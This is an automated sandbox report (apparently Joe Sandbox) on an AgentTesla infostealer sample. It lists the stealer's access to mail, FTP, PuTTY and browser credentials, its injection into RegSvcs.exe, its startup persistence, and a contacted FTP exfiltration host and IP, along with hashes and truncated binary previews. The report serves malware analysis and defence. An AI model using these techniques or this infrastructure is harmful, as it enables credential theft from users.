                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: unjuridically.exeBinary or memory string: WIN_81
                    Source: unjuridically.exeBinary or memory string: WIN_XP
                    Source: unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                    Source: unjuridically.exeBinary or memory string: WIN_XPe
                    Source: unjuridically.exeBinary or memory string: WIN_VISTA
                    Source: unjuridically.exeBinary or memory string: WIN_7
                    Source: unjuridically.exeBinary or memory string: WIN_8
                    Source: Yara matchFile source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1712, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6796, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1712, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6796, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00188C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00188C4F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0018923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_0018923B
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01028C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_01028C4F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0102923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_0102923B

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts3
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		21
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		11
                    Software Packing                    		NTDS138
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets751
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		1
                    Masquerading                    		Cached Domain Credentials231
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection                    		Network Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587765 Sample: XoRPyi5s1i.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 ftp.antoniomayol.com 2->30 32 antoniomayol.com 2->32 34 ip-api.com 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 10 other signatures 2->46 8 XoRPyi5s1i.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\...\unjuridically.exe, PE32 8->26 dropped 62 Binary is likely a compiled AutoIt script file 8->62 14 unjuridically.exe 3 8->14         started        64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->64 18 unjuridically.exe 2 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\unjuridically.vbs, data 14->28 dropped 66 Multi AV Scanner detection for dropped file 14->66 68 Binary is likely a compiled AutoIt script file 14->68 70 Machine Learning detection for dropped file 14->70 76 3 other signatures 14->76 20 RegSvcs.exe 15 2 14->20         started        72 Writes to foreign memory regions 18->72 74 Maps a DLL or memory area into another process 18->74 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 antoniomayol.com 162.241.62.63, 21, 43704, 49706 UNIFIEDLAYER-AS-1US United States 20->36 38 ip-api.com 208.95.112.1, 49704, 49710, 80 TUT-ASUS United States 20->38 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->48 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->50 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->52 54 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 20->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal ftp login credentials 24->58 60 Tries to harvest and steal browser information (history, passwords, etc) 24->60 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    XoRPyi5s1i.exe63%ReversingLabsWin32.Trojan.AutoitInject
                    XoRPyi5s1i.exe75%VirustotalBrowse
                    XoRPyi5s1i.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Lityerses\unjuridically.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Lityerses\unjuridically.exe63%ReversingLabsWin32.Trojan.AutoitInject

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://antoniomayol.com0%Avira URL Cloudsafe
                    http://ftp.antoniomayol.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    antoniomayol.com
                    		162.241.62.63
                    		truetrue
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high
                        ftp.antoniomayol.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://antoniomayol.comRegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ftp.antoniomayol.comRegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://account.dyn.com/unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ip-api.comRegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  208.95.112.1
                                  		ip-api.comUnited States
                                  		53334TUT-ASUSfalse
                                  162.241.62.63
                                  		antoniomayol.comUnited States
                                  		46606UNIFIEDLAYER-AS-1UStrue

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1587765
                                  Start date and time:2025-01-10 17:50:03 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 10s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:XoRPyi5s1i.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 65
                                  • Number of non-executed functions: 294
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:51:27API Interceptor1999943x Sleep call for process: RegSvcs.exe modified
                                  17:51:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  208.95.112.1NX8j2O83Wu.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  7569qiv4L2.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  hCkkM0lH0P.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  sDflTDPSLw.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  2HCwqwLg1G.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  CdbVaYf8jC.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  H9YFiQB7o3.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  lFlw40OH6u.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Pago devuelto #.Documentos#9787565789678675645767856843.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  driver.exeGet hashmaliciousBlank GrabberBrowse
                                  • ip-api.com/json/?fields=225545
                                  162.241.62.63Order 122001-220 guanzo.exeGet hashmaliciousFormBookBrowse
                                  • www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ip-api.comNX8j2O83Wu.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  7569qiv4L2.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  hCkkM0lH0P.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  sDflTDPSLw.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  2HCwqwLg1G.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  CdbVaYf8jC.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  H9YFiQB7o3.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  lFlw40OH6u.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Pago devuelto #.Documentos#9787565789678675645767856843.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  driver.exeGet hashmaliciousBlank GrabberBrowse
                                  • 208.95.112.1

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  UNIFIEDLAYER-AS-1USNX8j2O83Wu.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.241.62.63
                                  B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                  • 192.254.225.136
                                  FSRHC6mB16.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 50.87.144.157
                                  9pIm5d0rsW.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                  • 50.87.144.157
                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                  • 76.162.166.146
                                  https://sacredartscommunications.com/Get hashmaliciousHTMLPhisherBrowse
                                  • 192.185.25.242
                                  http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29tGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                  • 192.185.118.129
                                  5.elfGet hashmaliciousUnknownBrowse
                                  • 162.144.117.236
                                  https://p3rsa.appdocumentcenter.com/BpdLOGet hashmaliciousHTMLPhisherBrowse
                                  • 162.241.149.91
                                  https://app.whirr.co/p/cm4711if90205nv0h2e4l0imuGet hashmaliciousUnknownBrowse
                                  • 162.241.149.91
                                  TUT-ASUSNX8j2O83Wu.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  7569qiv4L2.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  hCkkM0lH0P.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  sDflTDPSLw.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  2HCwqwLg1G.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  CdbVaYf8jC.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  H9YFiQB7o3.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  lFlw40OH6u.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Pago devuelto #.Documentos#9787565789678675645767856843.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  driver.exeGet hashmaliciousBlank GrabberBrowse
                                  • 208.95.112.1

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Lityerses\unjuridically.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Category:dropped
                                  Size (bytes):550912
                                  Entropy (8bit):7.9240582473113905
                                  Encrypted:false
                                  SSDEEP:12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiGDtC2ajbP50s3o32+:Zq5TfcdHj4fmbcv13GV
                                  MD5:FC76D8B178C0AA094EBA5FEA74E82614
                                  SHA1:F2F88413E1E3AED4FD731769037C3D2391D29C94
                                  SHA-256:811C8854EA3ADCD1259C28CF1DC60E0A0A2F7A44F463E98F77C277A2A2F6394B
                                  SHA-512:72F5CA123610CBC3CCEE6630148C61E99F8DDBFFBBE835EB2BF323A0A6D5F2FDD57BAFA139595E62EA485F2086B1DD46F994281070639CD5E7FF89EB3422FD2B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 63%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.....hg.........."......P...0...`..`....p........@.......................................@...@.......@.........................$...................................................................D...H...........................................UPX0.....`..............................UPX1.....P...p...B..................@....rsrc....0......."...F..............@......................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                  C:\Users\user\AppData\Local\Temp\acrorrheuma

                                  Download File
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):245248
                                  Entropy (8bit):6.5490173775607365
                                  Encrypted:false
                                  SSDEEP:6144:PceANBRND9iy7zfovLfMJny1bZZYUlqzEO3IL0u9SYXAgrLjc98:ZANv3fY5TAe4u9SYXAejm8
                                  MD5:FD16AC67E115A223CC50F5019A3F052B
                                  SHA1:1D703AC8FF6EB9450697CD1876405AE608E9CF37
                                  SHA-256:11374F7B169A7DD18927070D7961F1050FC8B6A98B9803EB15A2687F4A62D89D
                                  SHA-512:593582A3D9EB4D2A9E0A35099819A14FD3B6633456A2F33C48652BF97F615E34ABC435BDF7C9144E54F9E7D6B88480110892B51E9D5D29E73698B80D493EF2FD
                                  Malicious:false
                                  Reputation:low
                                  Preview:z..W6AB1V9N9..RX.5AB1R9NyM7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1.9N9C(.VW.H...8..lc:1$.10^5K/TmT369Z5bS7.<L#.;6wq...?V*\c:_Rs5AB1R9Ni.7R.V6A1.._N9M7RXW5.B3S2O2M7.[W5IB1R9N9..QXW.AB1.:N9MwRXw5AB3R9J9M7RXW5EB1R9N9M7r\W5CB1R9N9O7..W5QB1B9N9M'RXG5AB1R9^9M7RXW5AB1R5.:MxRXW5.A1.<N9M7RXW5AB1R9N9M7RXW1AN1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB.R9F9M7RXW5AB1R1n9M.RXW5AB1R9N9cC7 #5ABU.:N9m7RX.6AB3R9N9M7RXW5AB1R.N9-. +%VAB1.<N9M.QXW3AB1.:N9M7RXW5AB1R9.9Mw|*2Y.!1R5N9M7R\W5CB1R.M9M7RXW5AB1R9NyM7.XW5AB1R9N9M7RXW5..2R9N9M.RXW7AG1..L9%.SXT5AB0R9H9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB,......l.*.K 6...^.4..D..;..6.,.LF.~.O....jBT..5.M..0...".IGHS....j8\DO*b%.AX.*....|cE.r.?#.(..?p.<?j.d...q.....6:g...,.."-\|X>I!R|.6S 0X.;.8M7RX......P5|.uT:_v#*o..fJ/c...GN9MSRXWGAB139N9.7RX85AB_R9NGM7R&W5A.1R9.9M7eXW5dB1RTN9M.RXWKAB1.DA6..1$..B1R9N...b.:...n.....#.)n#z..*....]..N*.%z.~..\.^..&.RH..oUYQ1D@6V:B.C|....CF5W;I=N;oV........t...&...b(.29M7RXW.AB.R9N..7.XW5.B.R..9M7.W.A.1..9

                                  C:\Users\user\AppData\Local\Temp\autC337.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                  C:\Users\user\AppData\Local\Temp\autC3B5.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Reputation:low
